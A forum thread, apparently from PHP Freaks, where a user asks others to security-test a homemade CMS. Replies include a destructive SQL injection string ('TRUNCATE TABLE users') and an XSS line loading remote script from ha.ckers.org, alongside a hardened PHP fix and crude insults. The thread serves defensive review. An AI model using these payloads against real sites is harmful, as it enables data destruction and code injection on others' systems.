
Hey guys. I just made a content management system this week and, for me, it's pretty decent. Can you please check it out and tell me if there are any errors in it, etc.? Things I should maybe change. Thanks!


The site is: http://www.parkerandsonsservices.com.

It is a website I am making for my dad's company.

I am wanting suggestions on the scripting, not the design, please. I know I'm terribad at designing.

Go to http://www.parkerandsonsservices.com/admin/ to access the admin panel.

Username: test

Password: test

Please keep everything clean, and don't spam anything or delete the already-made pages that I have created, which include:

Home, Services, Testimonials, Photos, Quotes, Contact.


Thanks :D

https://forums.phpfreaks.com/topic/129885-solved-beta-test-my-cms-please-d/

Where you have index.php?id=1 or 2 or 3, etc., you need to make sure that if that value is passed to a MySQL query, which I'm sure it will be, the numeric value is quoted with single quotes in the MySQL query and the value is checked to be an integer. If it isn't, then even if you use mysql_real_escape_string I could still pass commands such as index.php?id=;%20TRUNCATE%20TABLE users%20--, which would bypass real_escape_string as there are no illegal characters in it, and it would empty your users table, etc.

The deletion functionality is vulnerable to CSRF attacks. You can solve this using a token and validating it on the deletion request. See: http://www.phpfreaks.com/tutorial/php-security/page8
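A hardened version of the two handlers this reply describes, as an added example that is not the thread's or the CMS's own code: the id parameter is validated as an integer and bound as a query parameter, and deletions require a per-session CSRF token. The PDO connection in $pdo and the `pages` table with an integer `id` column are assumptions.

```php
<?php
// Added example, not the original poster's code. Assumes an existing PDO
// connection in $pdo and a `pages` table with an integer `id` column.
session_start();
// 1. Validate id as a positive integer before it goes anywhere near SQL.
//    "27" -> 27; "; TRUNCATE TABLE users --" -> null (request rejected).
function page_id(array $params): ?int {
    $id = filter_var($params['id'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// 2. Bind the (already validated) integer instead of pasting it into the query string.
function load_page(PDO $pdo, int $id): ?array {
    $stmt = $pdo->prepare('SELECT title, body FROM pages WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 3. CSRF: one random token per session, required on every deletion request.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_token_is_valid(?string $submitted): bool {
    return $submitted !== null && !empty($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Deletion handler: POST only, token and id checked before anything is touched.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['delete'])) {
    $id = page_id($_POST);
    if ($id === null || !csrf_token_is_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid request');
    }
    $stmt = $pdo->prepare('DELETE FROM pages WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
}

// The delete form carries the token in a hidden field; output values are HTML-escaped.
printf('<form method="post"><input type="hidden" name="csrf_token" value="%s">'
    . '<input type="hidden" name="id" value="%d"><button name="delete">Delete</button></form>',
    htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8'), page_id($_GET) ?? 0);
```

A link such as /admin/delete.php?id=3 then no longer deletes anything, since a GET request carries neither the POST method nor the session token.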

OK, thanks. And thanks a ton for the link; that really helped.


Thanks to all of you for helping me on security, because that's definitely a weakness for me.

XSS attacks


http://www.parkerandsonsservices.com/index.php?id=27 is the one I just did, just a pop-up that says xss.


In fact, I can directly add this:


<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>


PS: that script is just an XSS pop-up that says your site doesn't block XSS.


Don't fucking delete my homepage, you cunt.


LOLOLOLOLOLOLOLOLOLOLOL
